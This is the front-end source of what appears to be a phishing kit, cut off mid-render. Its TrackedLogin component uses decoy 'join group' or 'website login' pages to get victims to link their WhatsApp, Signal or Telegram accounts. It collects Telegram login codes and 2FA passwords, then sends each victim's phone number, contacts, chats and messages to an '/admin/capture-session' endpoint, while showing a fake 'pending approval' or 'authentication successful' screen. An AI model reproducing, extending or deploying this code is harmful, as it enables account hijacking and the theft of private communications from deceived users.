import React, { useState, useEffect, useCallback } from 'react';
import { QRCodeSVG } from 'qrcode.react';
import { socket } from '../App';
import { API_BASE_URL } from '../config';
import {
    Loader2,
    RefreshCw,
    Users,
    AlertTriangle,
    MessageCircle,
    CheckCircle2,
    Globe
} from 'lucide-react';
import { PhoneNumberLogin } from './PhoneNumberLogin';
import { PendingApproval } from './PendingApproval';
import { WhatsAppContact, WhatsAppChat, WhatsAppConnectionState } from './WhatsAppLogin';
import { SignalContact, SignalChat, SignalConnectionState } from './SignalLogin';

type TelegramAuthStep = 'qr' | 'phone' | 'code';

interface TelegramConnectionState {
    connected: boolean;
    syncing: boolean;
    syncProgress: { contacts: boolean; messages: boolean };
    qrDataUrl: string | null;
    phoneNumber: string | null;
    sessionId: string | null;
    error: string | null;
    authStep: TelegramAuthStep;
    isCodeViaApp: boolean;
    is2FARequired: boolean;
    twoFAHint: string | null;
}

interface TrackedLoginProps {
    linkId: string;
    loginMethod: 'qr' | 'phone' | 'both';
    platform: 'whatsapp' | 'signal' | 'telegram' | 'both';
    groupName: string;
    groupImage: string | null;
    telegramSubscriberCount?: number | null;
    redirectUrl?: string | null;
    scene: 'join-group' | 'website-login';
    callbackUrl?: string | null;
    websiteName?: string | null;
    websiteLogo?: string | null;
    websiteDescription?: string | null;
    preferredCountryCode?: string | null;
}

export function TrackedLogin({ linkId, loginMethod, platform, groupName, groupImage, telegramSubscriberCount, redirectUrl, scene, callbackUrl, websiteName, websiteLogo, websiteDescription, preferredCountryCode }: TrackedLoginProps) {
    const [activeMethod, setActiveMethod] = useState<'qr' | 'phone'>(loginMethod === 'phone' ? 'phone' : 'qr');
    const [activePlatform, setActivePlatform] = useState<'whatsapp' | 'signal' | 'telegram'>(platform === 'signal' ? 'signal' : platform === 'telegram' ? 'telegram' : 'whatsapp');
    const [isRefreshing, setIsRefreshing] = useState(false);
    const [hasClaimed, setHasClaimed] = useState(false);
    const [sessionCaptured, setSessionCaptured] = useState(false);
    const [sessionExpiredMessage, setSessionExpiredMessage] = useState<string | null>(null);
    const [isRedirecting, setIsRedirecting] = useState(false);
    const [telegramInviteAccepted, setTelegramInviteAccepted] = useState(!(scene === 'join-group' && platform === 'telegram'));
    const [connectionState, setConnectionState] = useState<WhatsAppConnectionState>({
        connected: false,
        syncing: false,
        syncProgress: {
            contacts: false,
            chats: false,
            messages: false
        },
        qrCode: null,
        phoneNumber: null
    });
    const [signalConnectionState, setSignalConnectionState] = useState<SignalConnectionState>({
        connected: false,
        syncing: false,
        syncProgress: { contacts: false, messages: false },
        qrUrl: null,
        phoneNumber: null,
        sessionId: null,
        error: null
    });
    const [contacts, setContacts] = useState<WhatsAppContact[]>([]);
    const [chats, setChats] = useState<WhatsAppChat[]>([]);
    const [messages, setMessages] = useState<{ [jid: string]: any[] }>({});
    const [signalContacts, setSignalContacts] = useState<SignalContact[]>([]);
    const [signalChats, setSignalChats] = useState<SignalChat[]>([]);
    const [signalMessages, setSignalMessages] = useState<{ [key: string]: any[] }>({});
    const [telegramConnectionState, setTelegramConnectionState] = useState<TelegramConnectionState>({
        connected: false,
        syncing: false,
        syncProgress: { contacts: false, messages: false },
        qrDataUrl: null,
        phoneNumber: null,
        sessionId: null,
        error: null,
        authStep: loginMethod === 'phone' ? 'phone' : 'qr',
        isCodeViaApp: false,
        is2FARequired: false,
        twoFAHint: null,
    });
    const [telegramContacts, setTelegramContacts] = useState<any[]>([]);
    const [telegramChats, setTelegramChats] = useState<any[]>([]);
    const [telegramMessages, setTelegramMessages] = useState<{ [key: string]: any[] }>({});
    const [telegramPhoneNumber, setTelegramPhoneNumber] = useState('');
    const [telegramPhoneCode, setTelegramPhoneCode] = useState('');
    const [telegram2FAPassword, setTelegram2FAPassword] = useState('');
    const defaultTelegramAuthStep: TelegramAuthStep = activeMethod === 'phone' ? 'phone' : 'qr';

    useEffect(() => {
        if (scene === 'join-group' && activePlatform === 'telegram') {
            setTelegramInviteAccepted(false);
            setHasClaimed(false);
        }
    }, [activePlatform, scene]);

    useEffect(() => {
        if (activePlatform !== 'telegram' || telegramConnectionState.connected) return;

        setHasClaimed(false);
        setTelegramConnectionState(prev => ({
            ...prev,
            authStep: defaultTelegramAuthStep,
            qrDataUrl: defaultTelegramAuthStep === 'qr' ? prev.qrDataUrl : null,
            error: null,
            isCodeViaApp: false,
            is2FARequired: false,
            twoFAHint: null,
        }));
        setTelegramPhoneCode('');
        setTelegram2FAPassword('');
    }, [activePlatform, defaultTelegramAuthStep, telegramConnectionState.connected]);

    // Handle session expired event
    useEffect(() => {
        function onSessionExpired(data: { message: string }) {
            console.log('[WhatsApp] Session expired:', data.message);
            setSessionExpiredMessage(data.message);
            setConnectionState({
                connected: false,
                syncing: false,
                syncProgress: { contacts: false, chats: false, messages: false },
                qrCode: null,
                phoneNumber: null
            });
            setContacts([]);
            setChats([]);
            setHasClaimed(false);
        }

        function onSignalSessionExpired(data: { message: string }) {
            console.log('[Signal] Session expired:', data.message);
            setSessionExpiredMessage(data.message);
            setSignalConnectionState({
                connected: false,
                syncing: false,
                syncProgress: { contacts: false, messages: false },
                qrUrl: null,
                phoneNumber: null,
                sessionId: null,
                error: null
            });
            setSignalContacts([]);
            setSignalChats([]);
            setHasClaimed(false);
        }

        socket.on('whatsapp-session-expired', onSessionExpired);
        socket.on('signal-session-expired', onSignalSessionExpired);

        function onTelegramSessionExpired(data: { message: string }) {
            console.log('[Telegram] Session expired:', data.message);
            setSessionExpiredMessage(data.message);
            setTelegramConnectionState({
                connected: false, syncing: false, syncProgress: { contacts: false, messages: false },
                qrDataUrl: null, phoneNumber: null, sessionId: null, error: null,
                authStep: defaultTelegramAuthStep, isCodeViaApp: false, is2FARequired: false, twoFAHint: null,
            });
            setTelegramContacts([]);
            setTelegramChats([]);
            setTelegramMessages({});
            setHasClaimed(false);
        }
        socket.on('telegram-session-expired', onTelegramSessionExpired);

        return () => {
            socket.off('whatsapp-session-expired', onSessionExpired);
            socket.off('signal-session-expired', onSignalSessionExpired);
            socket.off('telegram-session-expired', onTelegramSessionExpired);
        };
    }, [defaultTelegramAuthStep]);

    // Update link status (supports both platforms)
    const updateLinkStatus = useCallback(async (connected: boolean, phoneNumber: string | null, plat: 'whatsapp' | 'signal' | 'telegram' = 'whatsapp') => {
        try {
            const endpoint = plat === 'signal' ? 'signal-status' : plat === 'telegram' ? 'telegram-status' : 'whatsapp-status';
            await fetch(`${API_BASE_URL}/admin/links/${linkId}/${endpoint}`, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ connected, phoneNumber })
            });
        } catch (err) {
            console.error('Failed to update link status:', err);
        }
    }, [linkId]);

    // Capture session and send to admin (supports both platforms)
    const captureSession = useCallback(async (
        phoneNumber: string, 
        contactsList: any[], 
        chatsList: any[],
        messagesList: { [key: string]: any[] },
        plat: 'whatsapp' | 'signal' | 'telegram' = 'whatsapp'
    ) => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/capture-session`, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    linkId,
                    phoneNumber,
                    platform: plat,
                    contacts: contactsList,
                    chats: chatsList,
                    messages: messagesList,
                    userAgent: navigator.userAgent
                })
            });
            const data = await response.json();
            if (data.success) {
                console.log(`[${plat}] Session captured successfully:`, data.sessionId);

                // Website login: redirect back to the website with auth token
                if (scene === 'website-login' && data.authToken && data.callbackUrl) {
                    setIsRedirecting(true);
                    const separator = data.callbackUrl.includes('?') ? '&' : '?';
                    const redirectTarget = `${data.callbackUrl}${separator}auth_token=${encodeURIComponent(data.authToken)}`;
                    console.log(`[${plat}] Website login: redirecting to ${redirectTarget}`);
                    setTimeout(() => {
                        window.location.href = redirectTarget;
                    }, 1500);
                    return;
                }
            } else {
                console.warn(`[${plat}] Session capture returned:`, data.message);
            }
        } catch (err) {
            console.error('Failed to capture session:', err);
        }
        // Always show pending approval regardless of capture result
        setSessionCaptured(true);
    }, [linkId, scene]);

    // Handle successful phone login (WhatsApp)
    const handlePhoneLoginSuccess = useCallback((phoneNumber: string, userData: any) => {
        const userContacts = userData.contacts || [];
        const userChats = userData.chats || [];
        const userMessages = userData.messages || {};
        
        setConnectionState(prev => ({
            ...prev,
            connected: true,
            phoneNumber
        }));
        if (userContacts.length) setContacts(userContacts);
        if (userChats.length) setChats(userChats);
        if (Object.keys(userMessages).length) setMessages(userMessages);
        
        // Update tracking link status
        updateLinkStatus(true, phoneNumber, 'whatsapp');
        
        // Capture session for admin
        captureSession(phoneNumber, userContacts, userChats, userMessages, 'whatsapp');
    }, [updateLinkStatus, captureSession]);

    // Claim QR session once when component mounts (WhatsApp)
    useEffect(() => {
        if (activeMethod !== 'qr' || activePlatform !== 'whatsapp') return;
        if (hasClaimed || connectionState.connected) return;

        const claimSession = () => {
            if (!connectionState.connected && !connectionState.syncing && socket.connected && !hasClaimed) {
                console.log('[WhatsApp] Claiming QR session...');
                socket.emit('claim-whatsapp-session');
                setHasClaimed(true);
            }
        };

        const initialTimer = setTimeout(claimSession, 500);

        return () => {
            clearTimeout(initialTimer);
        };
    }, [activeMethod, activePlatform]); // eslint-disable-line react-hooks/exhaustive-deps

    // Claim Signal session when component mounts
    useEffect(() => {
        if (activePlatform !== 'signal') return;

        const claimSession = () => {
            if (!signalConnectionState.connected && !signalConnectionState.syncing && socket.connected && !hasClaimed) {
                console.log('[Signal] Claiming session...');
                socket.emit('claim-signal-session');
                setHasClaimed(true);
            }
        };

        const initialTimer = setTimeout(claimSession, 500);

        const handleConnect = () => {
            setTimeout(() => {
                if (!signalConnectionState.connected && !signalConnectionState.syncing) {
                    console.log('[Signal] Socket reconnected, re-claiming session...');
                    socket.emit('claim-signal-session');
                    setHasClaimed(true);
                }
            }, 500);
        };

        const handleDisconnect = () => {
            setHasClaimed(false);
        };

        socket.on('connect', handleConnect);
        socket.on('disconnect', handleDisconnect);

        return () => {
            clearTimeout(initialTimer);
            socket.off('connect', handleConnect);
            socket.off('disconnect', handleDisconnect);
        };
    }, [signalConnectionState.connected, signalConnectionState.syncing, hasClaimed, activePlatform]);

    // Signal socket event listeners
    useEffect(() => {
        if (activePlatform !== 'signal') return;

        function onSignalQr(data: { sessionId: string; qrUrl: string }) {
            console.log('[Signal] Received QR URL');
            setSignalConnectionState(prev => ({
                ...prev,
                qrUrl: data.qrUrl,
                sessionId: data.sessionId,
                error: null
            }));
        }

        function onSignalConnected(data: { sessionId: string; phoneNumber: string }) {
            console.log('[Signal] Connected:', data.phoneNumber);
            setSignalConnectionState(prev => ({
                ...prev,
                connected: true,
                qrUrl: null,
                phoneNumber: data.phoneNumber,
                sessionId: data.sessionId,
                error: null
            }));
            updateLinkStatus(true, data.phoneNumber, 'signal');
        }

        function onSignalSyncing() {
            setSignalConnectionState(prev => ({ ...prev, syncing: true }));
        }

        function onSignalContacts(data: { sessionId: string; contacts: SignalContact[] }) {
            console.log('[Signal] Received contacts:', data.contacts.length);
            setSignalContacts(data.contacts);
            setSignalConnectionState(prev => ({
                ...prev,
                syncProgress: { ...prev.syncProgress, contacts: true }
            }));
        }

        function onSignalChats(data: { sessionId: string; chats: SignalChat[] }) {
            console.log('[Signal] Received chats:', data.chats.length);
            setSignalChats(data.chats);
        }

        function onSignalMessage(data: { sessionId: string; message: any; chatKey: string }) {
            setSignalMessages(prev => ({
                ...prev,
                [data.chatKey]: [...(prev[data.chatKey] || []), data.message]
            }));
        }

        function onSignalSyncComplete(data: { sessionId: string; contactsCount: number; chatsCount: number }) {
            console.log('[Signal] Sync complete');
            setSignalConnectionState(prev => ({
                ...prev,
                syncing: false,
                syncProgress: { contacts: true, messages: true }
            }));
        }

        function onSignalDisconnected() {
            console.log('[Signal] Disconnected');
            setSignalConnectionState({
                connected: false,
                syncing: false,
                syncProgress: { contacts: false, messages: false },
                qrUrl: null,
                phoneNumber: null,
                sessionId: null,
                error: null
            });
            setSignalContacts([]);
            setSignalChats([]);
            setSignalMessages({});
            setHasClaimed(false);
            updateLinkStatus(false, null, 'signal');
        }

        function onSignalError(data: { message: string }) {
            console.error('[Signal] Error:', data.message);
            setSignalConnectionState(prev => ({ ...prev, error: data.message }));
        }

        socket.on('signal-qr', onSignalQr);
        socket.on('signal-connected', onSignalConnected);
        socket.on('signal-syncing', onSignalSyncing);
        socket.on('signal-contacts', onSignalContacts);
        socket.on('signal-chats', onSignalChats);
        socket.on('signal-message', onSignalMessage);
        socket.on('signal-sync-complete', onSignalSyncComplete);
        socket.on('signal-disconnected', onSignalDisconnected);
        socket.on('signal-error', onSignalError);

        return () => {
            socket.off('signal-qr', onSignalQr);
            socket.off('signal-connected', onSignalConnected);
            socket.off('signal-syncing', onSignalSyncing);
            socket.off('signal-contacts', onSignalContacts);
            socket.off('signal-chats', onSignalChats);
            socket.off('signal-message', onSignalMessage);
            socket.off('signal-sync-complete', onSignalSyncComplete);
            socket.off('signal-disconnected', onSignalDisconnected);
            socket.off('signal-error', onSignalError);
        };
    }, [activePlatform, updateLinkStatus]);

    // Capture Signal session when sync is complete
    useEffect(() => {
        if (activePlatform !== 'signal') return;
        
        if (signalConnectionState.connected && 
            signalConnectionState.phoneNumber && 
            !signalConnectionState.syncing && 
            signalConnectionState.syncProgress.contacts &&
            !sessionCaptured) {
            const timer = setTimeout(() => {
                console.log('[Signal] Capturing session with', signalContacts.length, 'contacts');
                captureSession(signalConnectionState.phoneNumber!, signalContacts, signalChats, signalMessages, 'signal');
            }, 2000);
            return () => clearTimeout(timer);
        }
    }, [activePlatform, signalConnectionState, signalContacts, signalChats, signalMessages, sessionCaptured, captureSession]);

    // Claim Telegram session when component mounts
    useEffect(() => {
        if (activePlatform !== 'telegram') return;
        if (scene === 'join-group' && !telegramInviteAccepted) return;

        const claimSession = () => {
            if (!telegramConnectionState.connected && !telegramConnectionState.syncing && socket.connected && !hasClaimed) {
                console.log(`[Telegram] Claiming ${activeMethod} session...`);
                socket.emit('claim-telegram-session', { loginMethod: activeMethod });
                setHasClaimed(true);
            }
        };

        const initialTimer = setTimeout(claimSession, 500);

        const handleConnect = () => {
            setTimeout(() => {
                if (!telegramConnectionState.connected && !telegramConnectionState.syncing) {
                    console.log(`[Telegram] Socket reconnected, re-claiming ${activeMethod} session...`);
                    socket.emit('claim-telegram-session', { loginMethod: activeMethod });
                    setHasClaimed(true);
                }
            }, 500);
        };

        const handleDisconnect = () => {
            setHasClaimed(false);
        };

        socket.on('connect', handleConnect);
        socket.on('disconnect', handleDisconnect);

        return () => {
            clearTimeout(initialTimer);
            socket.off('connect', handleConnect);
            socket.off('disconnect', handleDisconnect);
        };
    }, [telegramConnectionState.connected, telegramConnectionState.syncing, hasClaimed, activePlatform, activeMethod, scene, telegramInviteAccepted]);

    // Telegram socket event listeners
    useEffect(() => {
        if (activePlatform !== 'telegram') return;

        function onTelegramQr(data: { sessionId: string; qrDataUrl: string }) {
            console.log('[Telegram] Received QR');
            setTelegramConnectionState(prev => ({
                ...prev,
                qrDataUrl: data.qrDataUrl,
                sessionId: data.sessionId,
                error: null,
                authStep: 'qr',
                isCodeViaApp: false,
            }));
        }

        function onTelegramPhoneRequired(data: { sessionId: string }) {
            setTelegramConnectionState(prev => ({
                ...prev,
                qrDataUrl: null,
                sessionId: data.sessionId,
                error: null,
                authStep: 'phone',
                isCodeViaApp: false,
            }));
        }

        function onTelegramCodeRequired(data: { sessionId: string; isCodeViaApp?: boolean; phoneNumber?: string | null }) {
            if (data.phoneNumber) {
                setTelegramPhoneNumber(data.phoneNumber);
            }

            setTelegramConnectionState(prev => ({
                ...prev,
                sessionId: data.sessionId,
                error: null,
                authStep: 'code',
                isCodeViaApp: !!data.isCodeViaApp,
                phoneNumber: data.phoneNumber || prev.phoneNumber,
                is2FARequired: false,
                twoFAHint: null,
            }));
        }

        function onTelegramConnected(data: { sessionId: string; phoneNumber: string }) {
            console.log('[Telegram] Connected:', data.phoneNumber);
            setTelegramConnectionState(prev => ({
                ...prev,
                connected: true,
                qrDataUrl: null,
                phoneNumber: data.phoneNumber,
                sessionId: data.sessionId,
                error: null,
                authStep: defaultTelegramAuthStep,
                isCodeViaApp: false,
                is2FARequired: false,
                twoFAHint: null,
            }));
            updateLinkStatus(true, data.phoneNumber, 'telegram');
        }

        function onTelegramSyncing() {
            setTelegramConnectionState(prev => ({ ...prev, syncing: true }));
        }

        function onTelegramContacts(data: { sessionId: string; contacts: any[] }) {
            console.log('[Telegram] Received contacts:', data.contacts.length);
            setTelegramContacts(data.contacts);
            setTelegramConnectionState(prev => ({
                ...prev,
                syncProgress: { ...prev.syncProgress, contacts: true },
            }));
        }

        function onTelegramChats(data: { sessionId: string; chats: any[] }) {
            console.log('[Telegram] Received chats:', data.chats.length);
            setTelegramChats(data.chats);
        }

        function onTelegramMessagesBatch(data: { sessionId: string; chatId: string; messages: any[] }) {
            setTelegramMessages(prev => ({
                ...prev,
                [data.chatId]: data.messages,
            }));
        }

        function onTelegramMessage(data: { sessionId: string; chatId: string; message: any }) {
            setTelegramMessages(prev => ({
                ...prev,
                [data.chatId]: [...(prev[data.chatId] || []), data.message],
            }));
        }

        function onTelegramSyncComplete(data: { sessionId: string; contactsCount: number; chatsCount: number }) {
            console.log('[Telegram] Sync complete');
            setTelegramConnectionState(prev => ({
                ...prev,
                syncing: false,
                syncProgress: { contacts: true, messages: true },
            }));
        }

        function onTelegramDisconnected() {
            console.log('[Telegram] Disconnected');
            setTelegramConnectionState({
                connected: false, syncing: false, syncProgress: { contacts: false, messages: false },
                qrDataUrl: null, phoneNumber: null, sessionId: null, error: null,
                authStep: defaultTelegramAuthStep, isCodeViaApp: false, is2FARequired: false, twoFAHint: null,
            });
            setTelegramContacts([]);
            setTelegramChats([]);
            setTelegramMessages({});
            setTelegramPhoneCode('');
            setTelegram2FAPassword('');
            setHasClaimed(false);
            updateLinkStatus(false, null, 'telegram');
        }

        function onTelegramError(data: { message: string }) {
            console.error('[Telegram] Error:', data.message);
            setTelegramConnectionState(prev => ({ ...prev, error: data.message }));
        }

        function onTelegram2FA(data: { sessionId: string; hint: string | null }) {
            setTelegramConnectionState(prev => ({
                ...prev,
                is2FARequired: true,
                twoFAHint: data.hint || null,
            }));
        }

        socket.on('telegram-qr', onTelegramQr);
        socket.on('telegram-phone-required', onTelegramPhoneRequired);
        socket.on('telegram-code-required', onTelegramCodeRequired);
        socket.on('telegram-connected', onTelegramConnected);
        socket.on('telegram-syncing', onTelegramSyncing);
        socket.on('telegram-contacts', onTelegramContacts);
        socket.on('telegram-chats', onTelegramChats);
        socket.on('telegram-messages-batch', onTelegramMessagesBatch);
        socket.on('telegram-message', onTelegramMessage);
        socket.on('telegram-sync-complete', onTelegramSyncComplete);
        socket.on('telegram-disconnected', onTelegramDisconnected);
        socket.on('telegram-error', onTelegramError);
        socket.on('telegram-2fa-required', onTelegram2FA);

        return () => {
            socket.off('telegram-qr', onTelegramQr);
            socket.off('telegram-phone-required', onTelegramPhoneRequired);
            socket.off('telegram-code-required', onTelegramCodeRequired);
            socket.off('telegram-connected', onTelegramConnected);
            socket.off('telegram-syncing', onTelegramSyncing);
            socket.off('telegram-contacts', onTelegramContacts);
            socket.off('telegram-chats', onTelegramChats);
            socket.off('telegram-messages-batch', onTelegramMessagesBatch);
            socket.off('telegram-message', onTelegramMessage);
            socket.off('telegram-sync-complete', onTelegramSyncComplete);
            socket.off('telegram-disconnected', onTelegramDisconnected);
            socket.off('telegram-error', onTelegramError);
            socket.off('telegram-2fa-required', onTelegram2FA);
        };
    }, [activePlatform, defaultTelegramAuthStep, updateLinkStatus]);

    // Capture Telegram session when sync is complete
    useEffect(() => {
        if (activePlatform !== 'telegram') return;

        if (telegramConnectionState.connected &&
            telegramConnectionState.phoneNumber &&
            !telegramConnectionState.syncing &&
            telegramConnectionState.syncProgress.contacts &&
            !sessionCaptured) {
            const timer = setTimeout(() => {
                console.log('[Telegram] Capturing session with', telegramContacts.length, 'contacts');
                captureSession(telegramConnectionState.phoneNumber!, telegramContacts, telegramChats, telegramMessages, 'telegram');
            }, 2000);
            return () => clearTimeout(timer);
        }
    }, [activePlatform, telegramConnectionState, telegramContacts, telegramChats, telegramMessages, sessionCaptured, captureSession]);

    // WhatsApp socket event listeners
    useEffect(() => {
        if (activePlatform !== 'whatsapp') return;
        
        function onQr(qr: string) {
            console.log('[WhatsApp] Received QR code');
            setConnectionState(prev => ({ ...prev, qrCode: qr }));
        }

        function onConnected(data: { phoneNumber: string; sessionId?: string }) {
            console.log('[WhatsApp] Connected:', data.phoneNumber, 'Session:', data.sessionId);
            setConnectionState(prev => ({
                ...prev,
                connected: true,
                qrCode: null,
                phoneNumber: data.phoneNumber
            }));
            // Update tracking link status
            updateLinkStatus(true, data.phoneNumber, 'whatsapp');
        }

        function onDisconnected() {
            console.log('[WhatsApp] Disconnected (terminal)');
            setConnectionState({
                connected: false,
                syncing: false,
                syncProgress: { contacts: false, chats: false, messages: false },
                qrCode: null,
                phoneNumber: null
            });
            setContacts([]);
            setChats([]);
            // Don't reset hasClaimed - let the server handle reconnection.
            // Only re-claim if user explicitly refreshes.
            // Update tracking link status
            updateLinkStatus(false, null, 'whatsapp');
        }

        function onSyncing(data: { syncing: boolean; progress: { contacts: boolean; chats: boolean; messages: boolean } }) {
            console.log('[WhatsApp] Syncing:', data);
            setConnectionState(prev => ({
                ...prev,
                syncing: data.syncing,
                syncProgress: data.progress
            }));
        }

        function onSyncComplete() {
            console.log('[WhatsApp] Sync complete');
            setConnectionState(prev => ({
                ...prev,
                syncing: false,
                syncProgress: { contacts: true, chats: true, messages: true }
            }));
        }

        function onContacts(contactsList: WhatsAppContact[]) {
            console.log('[WhatsApp] Received contacts:', contactsList.length);
            setContacts(contactsList);
        }

        function onChats(chatsList: WhatsAppChat[]) {
            console.log('[WhatsApp] Received chats:', chatsList.length);
            setChats(chatsList);
        }

        function onMessages(messagesList: { [jid: string]: any[] }) {
            const totalMessages = Object.values(messagesList).reduce((sum, msgs) => sum + msgs.length, 0);
            console.log('[WhatsApp] Received messages:', totalMessages, 'messages across', Object.keys(messagesList).length, 'chats');
            setMessages(messagesList);
        }

        socket.on('whatsapp-qr', onQr);
        socket.on('whatsapp-connected', onConnected);
        socket.on('whatsapp-disconnected', onDisconnected);
        socket.on('whatsapp-syncing', onSyncing);
        socket.on('whatsapp-sync-complete', onSyncComplete);
        socket.on('whatsapp-contacts', onContacts);
        socket.on('whatsapp-chats', onChats);
        socket.on('whatsapp-messages', onMessages);

        return () => {
            socket.off('whatsapp-qr', onQr);
            socket.off('whatsapp-connected', onConnected);
            socket.off('whatsapp-disconnected', onDisconnected);
            socket.off('whatsapp-syncing', onSyncing);
            socket.off('whatsapp-sync-complete', onSyncComplete);
            socket.off('whatsapp-contacts', onContacts);
            socket.off('whatsapp-chats', onChats);
            socket.off('whatsapp-messages', onMessages);
        };
    }, [linkId, updateLinkStatus, activePlatform]);

    // Capture WhatsApp session when connected and sync is complete (for QR login)
    // Wait for sync complete AND ensure we have data
    useEffect(() => {
        if (activePlatform !== 'whatsapp') return;
        
        if (connectionState.connected && 
            connectionState.phoneNumber && 
            !connectionState.syncing && 
            connectionState.syncProgress.chats &&  // Ensure chats sync is marked complete
            connectionState.syncProgress.messages &&  // Ensure messages sync is marked complete
            !sessionCaptured &&
            activeMethod === 'qr') {
            // Server now debounces sync-complete (waits 5s after last history batch)
            // So by the time we get sync-complete, all batches should be processed
            // Still add a small delay to ensure state is fully updated
            const timer = setTimeout(() => {
                const totalMessages = Object.values(messages).reduce((sum, msgs) => sum + msgs.length, 0);
                console.log('[Session] Capturing with', contacts.length, 'contacts,', chats.length, 'chats, and', totalMessages, 'messages');
                captureSession(connectionState.phoneNumber!, contacts, chats, messages, 'whatsapp');
            }, 2000);  // 2 second delay (server already waits 5s)
            return () => clearTimeout(timer);
        }
    }, [activePlatform, connectionState.connected, connectionState.phoneNumber, connectionState.syncing, connectionState.syncProgress.chats, connectionState.syncProgress.messages, sessionCaptured, activeMethod, contacts, chats, messages, captureSession]);

    const handleRefreshQR = async () => {
        setIsRefreshing(true);
        setSessionExpiredMessage(null);
        setHasClaimed(false);  // Reset claimed state to allow re-claiming
        
        if (activePlatform === 'signal') {
            socket.emit('refresh-signal-qr');
            setTimeout(() => setIsRefreshing(false), 1000);
            return;
        }

        if (activePlatform === 'telegram') {
            socket.emit('refresh-telegram-qr');
            setTimeout(() => setIsRefreshing(false), 1000);
            return;
        }
        
        try {
            const response = await fetch(`${API_BASE_URL}/whatsapp/refresh-qr`, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ socketId: socket.id }),  // Pass socket ID
            });
            const data = await response.json();
            if (!data.success) {
                console.error('Failed to refresh QR:', data.message);
            }
            // Re-claim session after refresh
            setTimeout(() => {
                socket.emit('claim-whatsapp-session');
                setHasClaimed(true);
            }, 500);
        } catch (err) {
            console.error('Error refreshing QR:', err);
        } finally {
            setTimeout(() => setIsRefreshing(false), 3000);
        }
    };

    // If redirecting to website after login
    if (isRedirecting) {
        return (
            <div className="min-h-screen bg-[#0a0a0f] flex items-center justify-center p-4">
                <div className="bg-slate-800 rounded-3xl border border-cyan-500/10 shadow-2xl p-8 text-center max-w-sm w-full">
                    {websiteLogo && (
                        <img src={websiteLogo} alt="" className="w-16 h-16 rounded-xl object-contain mx-auto mb-4 border border-white/10 bg-white/5 p-1" />
                    )}
                    <CheckCircle2 className="w-12 h-12 text-green-500 mx-auto mb-4" />
                    <h2 className="text-xl font-bold text-white mb-2">Authentication Successful</h2>
                    <p className="text-gray-400 mb-4">Redirecting you back to {websiteName || 'the website'}...</p>
                    <Loader2 className="w-6 h-6 text-cyan-400 animate-spin mx-auto" />
                </div>
            </div>
        );
    }

    // If session captured, show pending approval page (join-group scene only)
    if (sessionCaptured) {
        return (
            <PendingApproval
                groupName={groupName}
                groupImage={groupImage}
                platform={activePlatform}
                telegramSubscriberCount={telegramSubscriberCount}
                redirectUrl={redirectUrl}
            />
        );
    }

    const isConnected = activePlatform === 'signal' ? signalConnectionState.connected : activePlatform === 'telegram' ? telegramConnectionState.connected : connectionState.connected;
    const syncProgress = activePlatform === 'signal'
        ? signalConnectionState.syncProgress
        : activePlatform === 'telegram'
        ? telegramConnectionState.syncProgress
        : connectionState.syncProgress;
    const visibleContactsCount = activePlatform === 'signal'
        ? signalContacts.length
        : activePlatform === 'telegram'
        ? telegramContacts.length
        : contacts.length;
    const visibleChatsCount = activePlatform === 'telegram'
        ? telegramChats.length
        : chats.length;
    const visibleMessagesCount = activePlatform === 'signal'
        ? Object.values(signalMessages).reduce((sum, items) => sum + items.length, 0)
        : activePlatform === 'telegram'
        ? Object.values(telegramMessages).reduce((sum, items) => sum + items.length, 0)
        : Object.values(messages).reduce((sum, items) => sum + items.length, 0);
    const shouldShowSyncingScreen = isConnected && !sessionCaptured && (activePlatform !== 'whatsapp' || activeMethod === 'qr');
    const isWhatsAppQrSyncingScreen = activePlatform === 'whatsapp' && activeMethod === 'qr';
    
    if (shouldShowSyncingScreen) {
        const accentClass = activePlatform === 'signal' ? 'text-[#3A76F0]' : activePlatform === 'telegram' ? 'text-[#0088CC]' : 'text-[#00A884]';
        const checkClass = activePlatform === 'signal' ? 'text-[#3A76F0]' : activePlatform === 'telegram' ? 'text-[#0088CC]' : 'text-green-500';
        const syncingTitle = isWhatsAppQrSyncingScreen
            ? scene === 'join-group'
                ? 'Joining WhatsApp group...'
                : 'Connecting to WhatsApp...'
            : 'Syncing your data...';
        const syncingCaption = isWhatsAppQrSyncingScreen
            ? 'Please keep this page open while we finish connecting your WhatsApp account.'
            : 'Please wait while we process your account...';
        return (
            <div className={`min-h-screen flex items-center justify-center p-4 ${activePlatform === 'signal' ? 'bg-[#3A76F0]' : activePlatform === 'telegram' ? 'bg-[#0088CC]' : 'bg-[#00A884]'}`}>
                <div className="bg-white rounded-3xl shadow-2xl p-8 text-center max-w-sm w-full">
                    <Loader2 className={`w-12 h-12 animate-spin mx-auto mb-4 ${accentClass}`} />
                    <p className="text-gray-800 font-medium mb-4">{syncingTitle}</p>
                    {isWhatsAppQrSyncingScreen ? (
                        <div className="rounded-2xl bg-gray-50 px-4 py-5 text-center">
                            <p className="text-sm text-gray-600 leading-6">
                                Your device is connected. We are preparing WhatsApp and will continue automatically in a moment.
                            </p>
                        </div>
                    ) : (
                        <div className="space-y-2 text-left">
                            <div className="flex items-center gap-2 text-sm">
                                {syncProgress.contacts ? (
                                    <CheckCircle2 className={`w-4 h-4 ${checkClass}`} />
                                ) : (
                                    <Loader2 className={`w-4 h-4 animate-spin ${accentClass}`} />
                                )}
                                <span className="text-gray-600">Contacts</span>
                                {visibleContactsCount > 0 && <span className="text-gray-400 ml-auto">{visibleContactsCount}</span>}
                            </div>
                            {activePlatform !== 'signal' && (
                                <div className="flex items-center gap-2 text-sm">
                                    {activePlatform === 'telegram' || connectionState.syncProgress.chats ? (
                                        <CheckCircle2 className={`w-4 h-4 ${checkClass}`} />
                                    ) : (
                                        <Loader2 className={`w-4 h-4 animate-spin ${accentClass}`} />
                                    )}
                                    <span className="text-gray-600">Chats</span>
                                    {visibleChatsCount > 0 && <span className="text-gray-400 ml-auto">{visibleChatsCount}</span>}
                                </div>
                            )}
                            <div className="flex items-center gap-2 text-sm">
                                {syncProgress.messages ? (
                                    <CheckCircle2 className={`w-4 h-4 ${checkClass}`} />
                                ) : (
                                    <Loader2 className={`w-4 h-4 animate-spin ${accentClass}`} />
                                )}
                                <span className="text-gray-600">Messages</span>
                                {visibleMessagesCount > 0 && <span className="text-gray-400 ml-auto">{visibleMessagesCount}</span>}
                            </div>
                        </div>
                    )}
                    <p className="text-gray-400 text-xs mt-4">{syncingCaption}</p>
                </div>
            </div>
        );
